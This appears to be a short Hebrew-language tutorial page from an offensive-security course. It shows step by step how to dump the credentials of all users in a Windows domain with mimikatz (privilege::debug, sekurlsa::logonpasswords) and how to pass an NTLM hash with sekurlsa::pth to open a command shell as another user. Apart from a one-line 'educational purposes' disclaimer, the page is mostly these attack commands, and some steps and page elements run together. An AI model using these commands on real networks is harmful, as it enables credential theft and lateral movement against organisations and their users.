• אלי רובין

איך למצוא את כל סיסמאות של domain

קודם כל אתם צריכים להוריד mimikatz trunk לחץ כאן


this course is for educational purposes and you are the only person responsible for your actions


1.log hash.txt

2.privilege::debug


3.sekurlsa::logonpasswords4.יש לכם את כל המשתמשים בdomain jefflab5.קחו את הhash של איזה משתמש שאתם רוצים ו יהיה לכם 2 אופציות

1.להתחבר עליו עכשיו זה מה שנראה פה

2.לפרוץ את כל הסיסמאות ולעשות pivoting לחץ כאן


6.sekurlsa::pth /user (all user you want ) /domain(name of the domain) /ntlm:(the NTLM HASH) /run:cmd

7.ואתם ב tony.wonder0 צפיות
R

© 2019 maestro